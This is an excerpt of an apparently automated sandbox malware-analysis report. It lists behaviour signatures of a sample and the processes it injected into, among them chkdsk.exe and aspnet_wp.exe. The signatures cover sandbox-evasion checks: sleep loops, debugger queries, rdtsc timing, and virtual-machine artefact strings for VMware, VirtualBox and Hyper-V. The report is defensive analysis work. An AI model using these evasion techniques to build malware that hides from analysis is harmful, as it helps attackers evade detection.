Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8080	Thread sleep count: 3823 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8080	Thread sleep time: -7646000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8080	Thread sleep count: 6149 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8080	Thread sleep time: -12298000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe TID: 332	Thread sleep time: -95000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe TID: 332	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe TID: 332	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe TID: 332	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe TID: 332	Thread sleep time: -51000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\chkdsk.exe

Code function: 12_2_0081B5C0 FindFirstFileW,FindNextFileW,FindClose,

12_2_0081B5C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QEMUP
Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREP
Source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130120293.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareP
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: chkdsk.exe, 0000000C.00000002.4129628243.0000000004CD4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3'
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIP
Source: firefox.exe, 00000012.00000002.2128301408.000001971EFDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe

Code function: 5_2_0554D1C0 rdtsc

5_2_0554D1C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe

Code function: 5_2_004175D3 LdrLoadDll,

5_2_004175D3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D8550 mov eax, dword ptr fs:[00000030h]	5_2_054D8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D8550 mov eax, dword ptr fs:[00000030h]	5_2_054D8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550B570 mov eax, dword ptr fs:[00000030h]	5_2_0550B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550B570 mov eax, dword ptr fs:[00000030h]	5_2_0550B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB562 mov eax, dword ptr fs:[00000030h]	5_2_054CB562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550656A mov eax, dword ptr fs:[00000030h]	5_2_0550656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550656A mov eax, dword ptr fs:[00000030h]	5_2_0550656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550656A mov eax, dword ptr fs:[00000030h]	5_2_0550656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05507505 mov eax, dword ptr fs:[00000030h]	5_2_05507505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05507505 mov ecx, dword ptr fs:[00000030h]	5_2_05507505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05566500 mov eax, dword ptr fs:[00000030h]	5_2_05566500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A4500 mov eax, dword ptr fs:[00000030h]	5_2_055A4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A4500 mov eax, dword ptr fs:[00000030h]	5_2_055A4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A4500 mov eax, dword ptr fs:[00000030h]	5_2_055A4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A4500 mov eax, dword ptr fs:[00000030h]	5_2_055A4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A4500 mov eax, dword ptr fs:[00000030h]	5_2_055A4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A4500 mov eax, dword ptr fs:[00000030h]	5_2_055A4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A4500 mov eax, dword ptr fs:[00000030h]	5_2_055A4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550D530 mov eax, dword ptr fs:[00000030h]	5_2_0550D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550D530 mov eax, dword ptr fs:[00000030h]	5_2_0550D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A5537 mov eax, dword ptr fs:[00000030h]	5_2_055A5537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE53E mov eax, dword ptr fs:[00000030h]	5_2_054FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE53E mov eax, dword ptr fs:[00000030h]	5_2_054FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE53E mov eax, dword ptr fs:[00000030h]	5_2_054FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE53E mov eax, dword ptr fs:[00000030h]	5_2_054FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE53E mov eax, dword ptr fs:[00000030h]	5_2_054FE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557F525 mov eax, dword ptr fs:[00000030h]	5_2_0557F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557F525 mov eax, dword ptr fs:[00000030h]	5_2_0557F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557F525 mov eax, dword ptr fs:[00000030h]	5_2_0557F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557F525 mov eax, dword ptr fs:[00000030h]	5_2_0557F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557F525 mov eax, dword ptr fs:[00000030h]	5_2_0557F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557F525 mov eax, dword ptr fs:[00000030h]	5_2_0557F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557F525 mov eax, dword ptr fs:[00000030h]	5_2_0557F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558B52F mov eax, dword ptr fs:[00000030h]	5_2_0558B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DD534 mov eax, dword ptr fs:[00000030h]	5_2_054DD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DD534 mov eax, dword ptr fs:[00000030h]	5_2_054DD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DD534 mov eax, dword ptr fs:[00000030h]	5_2_054DD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DD534 mov eax, dword ptr fs:[00000030h]	5_2_054DD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DD534 mov eax, dword ptr fs:[00000030h]	5_2_054DD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DD534 mov eax, dword ptr fs:[00000030h]	5_2_054DD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0535 mov eax, dword ptr fs:[00000030h]	5_2_054E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0535 mov eax, dword ptr fs:[00000030h]	5_2_054E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0535 mov eax, dword ptr fs:[00000030h]	5_2_054E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0535 mov eax, dword ptr fs:[00000030h]	5_2_054E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0535 mov eax, dword ptr fs:[00000030h]	5_2_054E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0535 mov eax, dword ptr fs:[00000030h]	5_2_054E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550A5D0 mov eax, dword ptr fs:[00000030h]	5_2_0550A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550A5D0 mov eax, dword ptr fs:[00000030h]	5_2_0550A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554D5D0 mov eax, dword ptr fs:[00000030h]	5_2_0554D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554D5D0 mov ecx, dword ptr fs:[00000030h]	5_2_0554D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A35D7 mov eax, dword ptr fs:[00000030h]	5_2_055A35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A35D7 mov eax, dword ptr fs:[00000030h]	5_2_055A35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A35D7 mov eax, dword ptr fs:[00000030h]	5_2_055A35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055055C0 mov eax, dword ptr fs:[00000030h]	5_2_055055C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A55C9 mov eax, dword ptr fs:[00000030h]	5_2_055A55C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F95DA mov eax, dword ptr fs:[00000030h]	5_2_054F95DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D65D0 mov eax, dword ptr fs:[00000030h]	5_2_054D65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E5CF mov eax, dword ptr fs:[00000030h]	5_2_0550E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E5CF mov eax, dword ptr fs:[00000030h]	5_2_0550E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE5E7 mov eax, dword ptr fs:[00000030h]	5_2_054FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE5E7 mov eax, dword ptr fs:[00000030h]	5_2_054FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE5E7 mov eax, dword ptr fs:[00000030h]	5_2_054FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE5E7 mov eax, dword ptr fs:[00000030h]	5_2_054FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE5E7 mov eax, dword ptr fs:[00000030h]	5_2_054FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE5E7 mov eax, dword ptr fs:[00000030h]	5_2_054FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE5E7 mov eax, dword ptr fs:[00000030h]	5_2_054FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FE5E7 mov eax, dword ptr fs:[00000030h]	5_2_054FE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D25E0 mov eax, dword ptr fs:[00000030h]	5_2_054D25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15F4 mov eax, dword ptr fs:[00000030h]	5_2_054F15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15F4 mov eax, dword ptr fs:[00000030h]	5_2_054F15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15F4 mov eax, dword ptr fs:[00000030h]	5_2_054F15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15F4 mov eax, dword ptr fs:[00000030h]	5_2_054F15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15F4 mov eax, dword ptr fs:[00000030h]	5_2_054F15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15F4 mov eax, dword ptr fs:[00000030h]	5_2_054F15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550C5ED mov eax, dword ptr fs:[00000030h]	5_2_0550C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550C5ED mov eax, dword ptr fs:[00000030h]	5_2_0550C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555B594 mov eax, dword ptr fs:[00000030h]	5_2_0555B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555B594 mov eax, dword ptr fs:[00000030h]	5_2_0555B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C758F mov eax, dword ptr fs:[00000030h]	5_2_054C758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C758F mov eax, dword ptr fs:[00000030h]	5_2_054C758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C758F mov eax, dword ptr fs:[00000030h]	5_2_054C758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E59C mov eax, dword ptr fs:[00000030h]	5_2_0550E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D2582 mov eax, dword ptr fs:[00000030h]	5_2_054D2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D2582 mov ecx, dword ptr fs:[00000030h]	5_2_054D2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05504588 mov eax, dword ptr fs:[00000030h]	5_2_05504588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558F5BE mov eax, dword ptr fs:[00000030h]	5_2_0558F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15A9 mov eax, dword ptr fs:[00000030h]	5_2_054F15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15A9 mov eax, dword ptr fs:[00000030h]	5_2_054F15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15A9 mov eax, dword ptr fs:[00000030h]	5_2_054F15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15A9 mov eax, dword ptr fs:[00000030h]	5_2_054F15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F15A9 mov eax, dword ptr fs:[00000030h]	5_2_054F15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055635BA mov eax, dword ptr fs:[00000030h]	5_2_055635BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055635BA mov eax, dword ptr fs:[00000030h]	5_2_055635BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055635BA mov eax, dword ptr fs:[00000030h]	5_2_055635BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055635BA mov eax, dword ptr fs:[00000030h]	5_2_055635BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055505A7 mov eax, dword ptr fs:[00000030h]	5_2_055505A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055505A7 mov eax, dword ptr fs:[00000030h]	5_2_055505A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055505A7 mov eax, dword ptr fs:[00000030h]	5_2_055505A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F45B1 mov eax, dword ptr fs:[00000030h]	5_2_054F45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F45B1 mov eax, dword ptr fs:[00000030h]	5_2_054F45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FF5B0 mov eax, dword ptr fs:[00000030h]	5_2_054FF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FF5B0 mov eax, dword ptr fs:[00000030h]	5_2_054FF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FF5B0 mov eax, dword ptr fs:[00000030h]	5_2_054FF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FF5B0 mov eax, dword ptr fs:[00000030h]	5_2_054FF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FF5B0 mov eax, dword ptr fs:[00000030h]	5_2_054FF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FF5B0 mov eax, dword ptr fs:[00000030h]	5_2_054FF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FF5B0 mov eax, dword ptr fs:[00000030h]	5_2_054FF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FF5B0 mov eax, dword ptr fs:[00000030h]	5_2_054FF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FF5B0 mov eax, dword ptr fs:[00000030h]	5_2_054FF5B0
